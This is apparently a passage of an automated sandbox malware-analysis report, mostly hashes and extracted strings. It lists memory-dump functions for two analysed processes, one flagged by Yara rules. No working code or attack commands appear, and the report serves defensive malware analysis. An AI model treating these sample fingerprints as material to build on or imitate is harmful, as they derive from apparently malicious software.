                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 201c64ee9fb9dd8a6629e3865507532926fae8164b32dc3eafbb3fe24a0df28d
                                                              • Instruction ID: 1630573b802174b7b3c74e1393f28340896bcb95a28589d1b2fc556de0791573
                                                              • Opcode Fuzzy Hash: 201c64ee9fb9dd8a6629e3865507532926fae8164b32dc3eafbb3fe24a0df28d
                                                              • Instruction Fuzzy Hash: E390022120544442D50075585408A060045E7D1215F59D415A2464995DC775C965A231
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f7b6da07615d885aede9b908f31f9c1ef784f820c56a045e3c221267342fb66
                                                              • Instruction ID: f8d1a74bff9db89bd23e2012b10e3ea3adc276b4297d855ce802f05e4bdaca93
                                                              • Opcode Fuzzy Hash: 7f7b6da07615d885aede9b908f31f9c1ef784f820c56a045e3c221267342fb66
                                                              • Instruction Fuzzy Hash: 1F90022130140003D540715854186064045F7E2311F59D415E1814954CDA55C96A5322
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8d1e3aef3fa6c0c960e85f2596305ba08debdc88199295c9512731a16715cfde
                                                              • Instruction ID: b80dbb9a21f128c9a447c68ac2a862c4d73916438f4d5fc71643ed023c7e1f3b
                                                              • Opcode Fuzzy Hash: 8d1e3aef3fa6c0c960e85f2596305ba08debdc88199295c9512731a16715cfde
                                                              • Instruction Fuzzy Hash: A0900221242441525945B15844045074046F7E1251799C416A2814D50CC666D96AD721
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 059d8e77bd0761c21c2715869ae28828f313bd634f7e4db1e178a2067cea6b2d
                                                              • Instruction ID: 9622fa0ae5fbc3dcb18f5f910445527bfa2c4304d50526a5c789e25d437f9afd
                                                              • Opcode Fuzzy Hash: 059d8e77bd0761c21c2715869ae28828f313bd634f7e4db1e178a2067cea6b2d
                                                              • Instruction Fuzzy Hash: 4F90023124140402D541715844046060049F7D1251F99C416A1824954EC795CB6AAB61
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f425856d75f902c976536d1418c9dccae26d6f05f3ffe5229524983ec5b2d72
                                                              • Instruction ID: 1278b8da2db693a8db0366ff188dda21bdc2bec349a29221d4e255824f959ef5
                                                              • Opcode Fuzzy Hash: 8f425856d75f902c976536d1418c9dccae26d6f05f3ffe5229524983ec5b2d72
                                                              • Instruction Fuzzy Hash: 4990023120140842D50071584404B460045E7E1311F59C41AA1524A54DC755C9657621
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4d8f6420bdc23e5df7fd6569fc547e67f5c24eb711dbd134dbdf7ee6849cd838
                                                              • Instruction ID: 66a78f29bbf1fccc795b8f6b7463a6d6de38761a84739956f80b839d174a8fb5
                                                              • Opcode Fuzzy Hash: 4d8f6420bdc23e5df7fd6569fc547e67f5c24eb711dbd134dbdf7ee6849cd838
                                                              • Instruction Fuzzy Hash: 9490022160540402D540715854187060055E7D1211F59D415A1424954DC799CB6967A1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26d1e2fb5f23538e30e83d295f66b93dd9fe3949ddc632b00698e2795b96bba4
                                                              • Instruction ID: 460ff14e2501f4bf663d63dd26bf631d0fba57a67fad69e6fe7f0067281c15ed
                                                              • Opcode Fuzzy Hash: 26d1e2fb5f23538e30e83d295f66b93dd9fe3949ddc632b00698e2795b96bba4
                                                              • Instruction Fuzzy Hash: F190023120140403D500715855087070045E7D1211F59D815A1824958DD796C9656221
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 330c1ad558e58612efa87d7167b275dc8ec98c666b876f25348a944aa08fd141
• Instruction ID: 1086b1e93a157f635e3547459174d4960ddaed1900142110c391427b14a4d478
• Opcode Fuzzy Hash: 330c1ad558e58612efa87d7167b275dc8ec98c666b876f25348a944aa08fd141
• Instruction Fuzzy Hash: 985116B6E04256AFCB15DFAC8C8497EFBFCBB48240B548169F455DB649D334DE4087A0
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 00cfebeb43dede21c6cbb94e61292669edac3947fdd2d9f2393dcbca8799a58a
• Instruction ID: 25880c8c99db5c2caf385e76717894a4c3adbd8574b40d1feb5fd1783398754a
• Opcode Fuzzy Hash: 00cfebeb43dede21c6cbb94e61292669edac3947fdd2d9f2393dcbca8799a58a
• Instruction Fuzzy Hash: 2D51E675A00646EECB64DF6CCCA097EBBF9EB44204F04845DE9D6D7642E7B4DA408760
Strings
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01614725
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01614742
• Execute=1, xrefs: 01614713
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01614655
• ExecuteOptions, xrefs: 016146A0
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016146FC
• CLIENT(ntdll): Processing section info %ws..., xrefs: 01614787
Memory Dump Source
• Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: 3df0f738fcf051c52f9863b83bbb06b36a9b3ba543be2226ed3df548dcc35fc9
• Instruction ID: 3e3af68dcfec34329da07cc4a737dba287b182ec3f5d4faacc26ed7f564bcd3b
• Opcode Fuzzy Hash: 3df0f738fcf051c52f9863b83bbb06b36a9b3ba543be2226ed3df548dcc35fc9
• Instruction Fuzzy Hash: FB510A31A0021A7AEF21EAADDC85FAD7BB8FF59708F140499D505AF181EB709A41CF50
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction ID: e1238378e3c1e77f0c3316ecc386b3fa13d3cec6074cdffeb004e94b30e5a8f9
• Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction Fuzzy Hash: 7581E170E4524A8EEF2D8E6CC8587FEBBF1BF45322F18465AD851AF691C7308840CB51
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: 2905ebc795567ab577073a88ce364ad14b4c7e0c7208a1d6eed577e5a7b97f20
• Instruction ID: c842170e35986ad51c37ec74d1d55b2c52a8e06e595a5fe0a8b6256c5b42a2e1
• Opcode Fuzzy Hash: 2905ebc795567ab577073a88ce364ad14b4c7e0c7208a1d6eed577e5a7b97f20
• Instruction Fuzzy Hash: 1721837AE0011AEBDB60DF79CC50ABF7BECAF54640F44011AEE05D7200E7309A118BA1
Strings
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016102BD
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016102E7
• RTL: Re-Waiting, xrefs: 0161031E
Memory Dump Source
• Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: 0f28f042852cd4302a4662dd521a550588369d1bb20ee0c3d5e97116fe120659
• Instruction ID: 64febbf7df254bfb85ed83b33eea6c0f49853955504cc92aca84194f2cc415c5
• Opcode Fuzzy Hash: 0f28f042852cd4302a4662dd521a550588369d1bb20ee0c3d5e97116fe120659
• Instruction Fuzzy Hash: 81E1CE306047429FDB25CF68C884B6ABBE2BB84B14F144A5EF5A5CB3E1D774D885CB42
Strings
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01617B7F
• RTL: Resource at %p, xrefs: 01617B8E
• RTL: Re-Waiting, xrefs: 01617BAC
Memory Dump Source
• Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: 55d8ce24d3739bd335f2c18d4be00d4987b8a359d75a8f9fb6a0488ec9351db5
                                                              • Instruction ID: 0c8c17f94cb2cd066512bf40a010c79ae9a0a9fe538678b62cf79dd07a5dfe89
                                                              • Opcode Fuzzy Hash: 55d8ce24d3739bd335f2c18d4be00d4987b8a359d75a8f9fb6a0488ec9351db5
                                                              • Instruction Fuzzy Hash: E641C0317017039FDB20DE2DCC40B6AB7E6FB9A710F100A5DE9569B280DB71E5058B91
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0161728C
                                                              Strings
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01617294
                                                              • RTL: Resource at %p, xrefs: 016172A3
                                                              • RTL: Re-Waiting, xrefs: 016172C1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 7a7ae82eff832ce83d77fe64e77a2e15cff419c62f3f541ee94ad7b67a8bd797
                                                              • Instruction ID: 914b7eb546666c05b54a7c9063245dda64420d117e68e67eda51351d8d1a3491
                                                              • Opcode Fuzzy Hash: 7a7ae82eff832ce83d77fe64e77a2e15cff419c62f3f541ee94ad7b67a8bd797
                                                              • Instruction Fuzzy Hash: 0641D031600616ABD721DE29CC41FAAB7A6FF95710F14861DF955EB340DB21E8428BD1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 638b12263eea15451a7ae2fd5ed56937fc31de904e378891779fe0fa9dca57eb
                                                              • Instruction ID: 7227dc3ed0f7c235fcaaaf713d5b87da17d1a76bc6233c8913d78b874d4d7806
                                                              • Opcode Fuzzy Hash: 638b12263eea15451a7ae2fd5ed56937fc31de904e378891779fe0fa9dca57eb
                                                              • Instruction Fuzzy Hash: 0B318672A0021ADFDB60DF2DCC50BEE77F8FB44610F440599ED49E7241EB30AA598BA0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 9cbd0fc63c2d8edd8896ac6f24e52438fed25dbaed28a09d23758ee899f9d974
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: FF917371E002169EEB2CDF6DC8896BEBBE5FF48720F14451AE975AF2C0E73099408791
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: a79f6badd34e1708eb222fbc6d7d80865972df8e8e48415d7818b05a86daa212
                                                              • Instruction ID: dd3dc1783d25360d4061558543ee3ed48abc0dbf094956145853f80ea9688a05
                                                              • Opcode Fuzzy Hash: a79f6badd34e1708eb222fbc6d7d80865972df8e8e48415d7818b05a86daa212
                                                              • Instruction Fuzzy Hash: C1811C71D4027A9BDB368F54CC54BEEB6B8BF48754F0045EAAA19B7280D7305E84CF64
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$ B$#$%y$19$2$>$D$E$GP$K_$PP$Qt$V$`J$c6$f$m$o$v>$x$}$,$>$_
                                                              • API String ID: 0-1984175023
                                                              • Opcode ID: 7704fa00fa424a47ad978bbc6c5729fa92d105ea550ac657f49fdc3e9c19f380
                                                              • Instruction ID: 27b1715631f186f934a3d6c38c0c1bed3b86555e928e8012bfb4cddf4369eadf
                                                              • Opcode Fuzzy Hash: 7704fa00fa424a47ad978bbc6c5729fa92d105ea550ac657f49fdc3e9c19f380
                                                              • Instruction Fuzzy Hash: 90428BB090526DDBEF68CF04D895BDDBBB2BB45308F1485DAD1096B291CBB95AC4CF80
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$O$S$\$s
                                                              • API String ID: 0-3854637164
                                                              • Opcode ID: 74f2a845a8c98f1cbd2e33735c6ec5c448920ce1012c5b9301475194a65474ab
                                                              • Instruction ID: e09c59a172fc0aef62a79cb6fe03ca38b5072fc3d9c8fbb42e0d3d63e73c49ed
                                                              • Opcode Fuzzy Hash: 74f2a845a8c98f1cbd2e33735c6ec5c448920ce1012c5b9301475194a65474ab
                                                              • Instruction Fuzzy Hash: 9C51E472D00219ABDF10EF94EC88EEEF3BCBB84705F04459AED099A154E7745A498BA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: yi
                                                              • API String ID: 0-2336885180
                                                              • Opcode ID: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                              • Instruction ID: 5134870fbd8c141c5a787552a020f5585294aa5c308f05553c34f3031160bab6
                                                              • Opcode Fuzzy Hash: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                              • Instruction Fuzzy Hash: C821EDB6D01219AFCB00DFE9D8408EFB7F9FF88210F04456AE919E7200E6715A058BA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 83c8bc8962ae1cda7f0d8d7b3d7564616a9d97dafb668fcbcb9444032b6bf7e8
                                                              • Instruction ID: 862a181990b1b1fbf21a064823be8c5545cf2872463a3381591842aa9624a241
                                                              • Opcode Fuzzy Hash: 83c8bc8962ae1cda7f0d8d7b3d7564616a9d97dafb668fcbcb9444032b6bf7e8
                                                              • Instruction Fuzzy Hash: C04118B1D11219AFDB00DF99D885AEEBBBCFF48710F10415AFA05E7240E7B0A641CBA4
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f413d01f484df2d047b2e8d45919c4bb039abd2104dac6aa64f115fee20feb2e
                                                              • Instruction ID: 021f97452a112f03aefe3d66481a046f0b462b886ac0705414e61bdd2a73283a
                                                              • Opcode Fuzzy Hash: f413d01f484df2d047b2e8d45919c4bb039abd2104dac6aa64f115fee20feb2e
                                                              • Instruction Fuzzy Hash: 0631E7B5A00749ABDB14DF98D881EEFB7B9FF88300F108119F909AB244D774A911CBA5
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 218d563c39c0a71cd3337df9d9d62a9197f35fc4b4fe87b00bf36fddaed69bb2
                                                              • Instruction ID: ca56945316f2e75c8b348a28b75eb78cf60991954a088b51d752e1b2734bdfb7
                                                              • Opcode Fuzzy Hash: 218d563c39c0a71cd3337df9d9d62a9197f35fc4b4fe87b00bf36fddaed69bb2
                                                              • Instruction Fuzzy Hash: 9F210AB5A04749ABDB14DF98DC81EEFB7B8EB88700F108509F909AB244D774A911CBA5
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 963cbaa09def02e4d1eb9250690dfd1d3dff3227b0342066ff4c39344effe0cf
                                                              • Instruction ID: 645a3ebd876b59954492b12e568da890661f47bc4818d8b6d6fa3f9735ff9b7f
                                                              • Opcode Fuzzy Hash: 963cbaa09def02e4d1eb9250690dfd1d3dff3227b0342066ff4c39344effe0cf
                                                              • Instruction Fuzzy Hash: CB1173B63803057AF720EE559C82FEB777CABD5B15F244015FB08AF1C0DAA5B81146B4
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4ead1439963b26653c200fde1fbbf3326f591bd6fe7ccce56ac6fc5d71bfee7
                                                              • Instruction ID: fc784ab92ee7d9d4f453dad0554c6fedca7137a10d0f9f370d1220ac7461f856
                                                              • Opcode Fuzzy Hash: a4ead1439963b26653c200fde1fbbf3326f591bd6fe7ccce56ac6fc5d71bfee7
                                                              • Instruction Fuzzy Hash: 43118B75A04719ABD710EF98EC41FEB77BCEB85700F104409F949AB280EA746A01CBA5
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65140a3b059ee79970d215b499d4bce6e3d18515d929f97248ad41fbe4fefd5c
                                                              • Instruction ID: f29322e3b998f1a28e5b159ec0481a5976aab5c2fd4bb33df2153c28ae78ec0c
                                                              • Opcode Fuzzy Hash: 65140a3b059ee79970d215b499d4bce6e3d18515d929f97248ad41fbe4fefd5c
                                                              • Instruction Fuzzy Hash: 81118E75A40B096BD710EF98DC85FEF73BCFB85710F004509F909AB280EA716A01CBA5
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9ff44f630e79ce15d8ce08663523b67a53b04885dae65d290f6903aa3378063
                                                              • Instruction ID: 30f39cd42a6f3fb9c42e79a57f4e3bf6cccc3b00574d9c6639ceb87a2a66bf75
                                                              • Opcode Fuzzy Hash: b9ff44f630e79ce15d8ce08663523b67a53b04885dae65d290f6903aa3378063
                                                              • Instruction Fuzzy Hash: 00113DB6D01219AF9B00DFA9E8509EEB7F8FF88200F44416AE919E7200E7715A01CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction ID: 6dbdb741fdea0d45f37d473878710c58f65ebf0a9a8ffb27596a6128244c77b5
                                                              • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction Fuzzy Hash: A701AEB6215608BBCB44DE99DC90EEB77BDEB8C710F508208BA09E7240D630F9518BA4
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b126ddd99a82b0e6a5761decd8d6853ac45a813b476234a54d0b7561d2c41cb1
                                                              • Instruction ID: d3f20d558cb9688e0f26a86b86d0e701714d4e878fd9aa92e4ac5c1fd30043da
                                                              • Opcode Fuzzy Hash: b126ddd99a82b0e6a5761decd8d6853ac45a813b476234a54d0b7561d2c41cb1
                                                              • Instruction Fuzzy Hash: DF01A9B6C0121DAFCB40EFE8D9419EEBBF8BB58200F54466ED515F7240E7755A048FA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cdd70f869fbf5487031d0afd2b1b7b48b218c4ec3db5d7e01abbeb37a10cc71c
                                                              • Instruction ID: 117622259ca3d30d13da90608164b9b9cf95585a845a6787052e0e7f56b1fef2
                                                              • Opcode Fuzzy Hash: cdd70f869fbf5487031d0afd2b1b7b48b218c4ec3db5d7e01abbeb37a10cc71c
                                                              • Instruction Fuzzy Hash: 9CF0B4736006166BD710AB5DBC84B9BF7ACFBC4220F140222F91DEB2A0DA7294518690
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75cd10afc6497bc7a15310c65ed230a475c283ab31228889cdcd35a57f93b811
                                                              • Instruction ID: bcf06d7f1144c23daa5800f80a929c385ae8444155a8ded1b312a59d3e22b7fb
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$U$g$r
                                                              • API String ID: 0-389700855
                                                              • Opcode ID: e9f1076cbba9a2a73c2caa7b8ebb51a73288b4aa9f5c2b418ca864eaa9be5405
                                                              • Instruction ID: 9c3002d069625b810bac8d8d5ef3248678a04c2f488c2a6da407c077b756a24b
                                                              • Opcode Fuzzy Hash: e9f1076cbba9a2a73c2caa7b8ebb51a73288b4aa9f5c2b418ca864eaa9be5405
                                                              • Instruction Fuzzy Hash: 9C3182B1910209BBEB00DFA4DC45BEF73B8FF44304F008589E908AB250EB71AA058BE5

                                                              Execution Graph

                                                              Execution Coverage:2.5%
                                                              Dynamic/Decrypted Code Coverage:4.3%
